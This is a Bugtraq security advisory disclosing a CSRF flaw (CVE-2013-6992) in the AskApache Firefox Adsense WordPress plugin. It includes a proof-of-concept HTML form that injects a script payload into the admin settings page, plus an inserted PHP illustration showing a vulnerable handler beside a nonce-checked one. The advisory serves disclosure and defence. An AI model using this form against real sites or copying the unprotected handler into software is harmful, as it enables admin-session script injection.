
List:       bugtraq
Subject:    Cross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordp
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2013-12-26 11:09:13
Message-ID: 20131226110913.F009F2C54882 () htbridge ! ch

Advisory ID: HTB23188
Product: AskApache Firefox Adsense Wordpress plugin
Vendor: AskApache
Vulnerable Version(s): 3.0 and probably prior
Tested Version: 3.0
Advisory Publication:  December 5, 2013  [without technical details]
Vendor Notification: December 5, 2013 
Public Disclosure: December 26, 2013 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2013-6992
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the AskApache Firefox
Adsense Wordpress plugin, which can be exploited to perform Cross-Site Request
Forgery (CSRF) attacks.


1) Cross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin: CVE-2013-6992

The vulnerability exists due to insufficient verification of the HTTP request origin
in the "/wp-admin/options-general.php" script. A remote attacker can trick a logged-in
administrator into visiting a specially crafted page containing a CSRF exploit, and thereby
inject and execute arbitrary HTML and script code in the administrator's browser in the
context of the vulnerable website.

The exploitation example below injects JavaScript code which uses the "alert()"
function to display the word "immuniweb":


<form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" method="post" name="main">
  <input type="hidden" name="aafireadcode" value='<script>alert("immuniweb");</script>'>
  <input type="submit" id="btn">
</form>
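The missing check the advisory describes, as an added illustration that is not the AskApache plugin's own source: a settings handler that saves the posted "aafireadcode" field without any origin verification, beside the same handler gated by a WordPress nonce and a capability check. Only the field name and the settings-page slug come from the advisory; the option name, function names and menu wiring are assumptions.

```php
<?php
// Added illustration, not the plugin's actual code. Option name, function
// names and menu registration are assumed; "aafireadcode" and the page slug
// "askapache-firefox-adsense.php" are the values given in the advisory.

// --- Vulnerable pattern: any POST that reaches the settings page is trusted ---
function aafa_save_settings_vulnerable() {
    if ( isset( $_POST['aafireadcode'] ) ) {
        // No nonce and no capability check: a form auto-submitted from another
        // site by a logged-in admin's browser lands here and is saved as-is.
        update_option( 'aafireadcode', wp_unslash( $_POST['aafireadcode'] ) );
    }
}

// --- Hardened pattern: same save path, gated by capability and nonce ---
function aafa_save_settings_hardened() {
    if ( ! isset( $_POST['aafireadcode'] ) ) {
        return;
    }
    // Only users permitted to change site options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Verify the per-user, per-action nonce emitted by our own form below.
    // A cross-site page cannot know it, so a forged request dies here.
    check_admin_referer( 'aafa_save_settings', 'aafa_nonce' );
    update_option( 'aafireadcode', wp_unslash( $_POST['aafireadcode'] ) );
}

// Settings form that emits the nonce the hardened handler verifies.
function aafa_render_settings_page() {
    aafa_save_settings_hardened();
    $code = get_option( 'aafireadcode', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=askapache-firefox-adsense.php' ) ); ?>">
        <?php wp_nonce_field( 'aafa_save_settings', 'aafa_nonce' ); ?>
        <!-- esc_textarea keeps the stored value from rendering as markup
             inside this admin page (the path the advisory's alert() uses). -->
        <textarea name="aafireadcode" rows="8" cols="60"><?php echo esc_textarea( $code ); ?></textarea>
        <?php submit_button(); ?>
    </form>
    <?php
}

add_action( 'admin_menu', function () {
    add_options_page( 'Firefox Adsense', 'Firefox Adsense', 'manage_options',
        'askapache-firefox-adsense.php', 'aafa_render_settings_page' );
} );
```

check_admin_referer() also falls back to the HTTP Referer when no nonce is present, but the nonce is the check that actually blocks the forged form above.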


-----------------------------------------------------------------------------------------------


Solution:

Disable the vulnerable plugin. 

On 2013-12-06 the vendor replied to our notification that the plugin will no longer be
supported, and proposed removing the vulnerable plugin as the official solution. The
vendor has also taken steps to remove this plugin from WordPress.org.


-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23188 - https://www.htbridge.com/advisory/HTB23188 - Cross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin.
[2] AskApache Firefox Adsense Wordpress plugin - http://wordpress.org/plugins/askapache-firefox-adsense/ - Displays a Google Adsense Ad for Firefox only for non-firefox users.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE ® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without
any warranty of any kind. Details of this Advisory may be updated in order to provide
as accurate information as possible. The latest version of the Advisory is available
on web page [1] in the References.

